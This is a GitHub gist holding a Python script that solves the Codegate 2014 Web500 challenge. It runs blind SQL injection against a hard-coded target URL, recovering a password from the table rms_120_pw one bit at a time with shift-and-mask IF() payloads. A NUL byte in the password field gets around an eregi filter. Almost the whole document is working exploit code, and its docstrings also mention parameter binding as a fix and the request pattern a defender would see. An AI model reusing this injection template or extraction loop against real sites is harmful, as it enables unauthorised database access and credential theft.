
@xelenonz
Last active August 29, 2015 13:56
Codegate 2014 (Web500) - Blind SQLi with bit shifting + bypass eregi
import urllib,urllib2
def find_length(cmd):
    """Return the length of the result of the SQL sub-query *cmd* as an int.

    Eight POST requests are sent, one per bit, most significant bit first.
    Each asks the database whether a given bit of length((cmd)) is set and
    treats the substring "True" in the response as a 1. Only the low eight
    bits are read, so a length above 255 is reported modulo 256.

    Reads the module globals ``site`` (target URL) and ``ip`` (the value the
    injected IF() returns when the bit is set).

    NOTE(review): the server side is not shown. The payload implies that the
    password value is concatenated into the SQL text after a filter that
    stops at the NUL byte (eregi is not binary-safe); binding the value as a
    query parameter removes the injection regardless of the filter.
    """
    bits = []
    for shift in range(7, -1, -1):
        # Same template on every request; only the shift count changes.
        injected = "1\x00') union select (IF( (select (length((%s))>>%d)&1 ), '%s', 'wrong')),2#" % (cmd, shift, ip)
        body = urllib.urlencode({"password": injected})
        # Passing a data argument makes urlopen issue a POST.
        page = urllib.urlopen(site, body).read()
        bits.append("1" if "True" in page else "0")
    return int("".join(bits), 2)
def find_char(cmd, position):
    """Return the character at 1-based *position* in the result of *cmd*.

    Eight POST requests are sent, one per bit of ascii(substr((cmd),
    position, 1)), most significant bit first; the substring "True" in the
    response counts as a 1. The eight bits are then decoded with chr().

    Reads the module globals ``site`` and ``ip``.

    Detection note: every recovered character costs eight near-identical
    POSTs whose ``password`` field carries a NUL byte followed by
    ``union select``; that pattern is visible in request logs and to a WAF.
    """
    bits = []
    for shift in range(7, -1, -1):
        injected = "1\x00') union select (IF((ascii(substr((%s),%d,1))>>%d)&1, '%s', 'wrong')),2#" % (cmd, position, shift, ip)
        body = urllib.urlencode({"password": injected})
        # Passing a data argument makes urlopen issue a POST.
        page = urllib.urlopen(site, body).read()
        bits.append("1" if "True" in page else "0")
    return chr(int("".join(bits), 2))
# Globals read by find_length() and find_char().
# ip: this client's public address as reported by an external service. The
# injected IF() returns it when the tested bit is 1.
# NOTE(review): presumably the page answers "True" when the first selected
# column equals the requester's address - the server code is not shown.
ip = urllib2.urlopen('http://ip.42.pl/raw').read()
site = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/"

# Sub-query whose single string result is read back bit by bit.
cmd = "select password from rms_120_pw where ip = 'my other IP'"

# Length first (8 requests), then 8 requests per character.
result_length = int(find_length(cmd))
print(result_length)

recovered = []
for position in range(1, result_length + 1):
    recovered.append(find_char(cmd, position))
result = "".join(recovered)
print(result)